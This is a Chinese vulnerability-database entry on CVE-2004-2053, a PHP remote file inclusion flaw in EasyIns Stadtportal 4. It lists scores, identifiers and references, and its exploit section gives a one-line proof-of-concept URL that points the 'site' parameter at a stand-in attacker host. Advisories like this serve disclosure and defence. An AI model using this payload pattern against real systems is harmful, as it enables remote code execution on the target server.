EasyIns Stadtportal站点参数远程文件内含物漏洞

EasyIns Stadtportal站点参数远程文件内含物漏洞

漏洞ID 1108078 漏洞类型 输入验证
发布时间 2004-07-24 更新时间 2005-10-20
图片[1]-EasyIns Stadtportal站点参数远程文件内含物漏洞-安全小百科CVE编号 CVE-2004-2053
图片[2]-EasyIns Stadtportal站点参数远程文件内含物漏洞-安全小百科CNNVD-ID CNNVD-200407-040
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/24311
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200407-040
|漏洞详情
EasyInsStadtportal4的index.php存在PHPremotefileinclusion漏洞。远程攻击者借助site参数执行任意PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/10795/info

EasyIns Stadtportal is reported prone to a vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable computer.

EasyIns Stadtportal version 4 is reported prone to this issue. Other versions may be affected as well.

http://www.example.com/stadtportal-path/index.php?site=http://www.evil-host.com
|参考资料

来源:XF
名称:easyins-php-file-include(16797)
链接:http://xforce.iss.net/xforce/xfdb/16797
来源:BID
名称:10795
链接:http://www.securityfocus.com/bid/10795
来源:SECTRACK
名称:1010769
链接:http://securitytracker.com/id?1010769
来源:BUGTRAQ
名称:20040724EasyinsStadtportal
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=109069241512694&w;=2
来源:OSVDB
名称:8233
链接:http://www.osvdb.org/8233

相关推荐: Hosting Controller Error.ASP Cross-Site Scripting Vulnerability

Hosting Controller Error.ASP Cross-Site Scripting Vulnerability 漏洞ID 1096477 漏洞类型 Input Validation Error 发布时间 2005-06-28 更新时间 2005…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享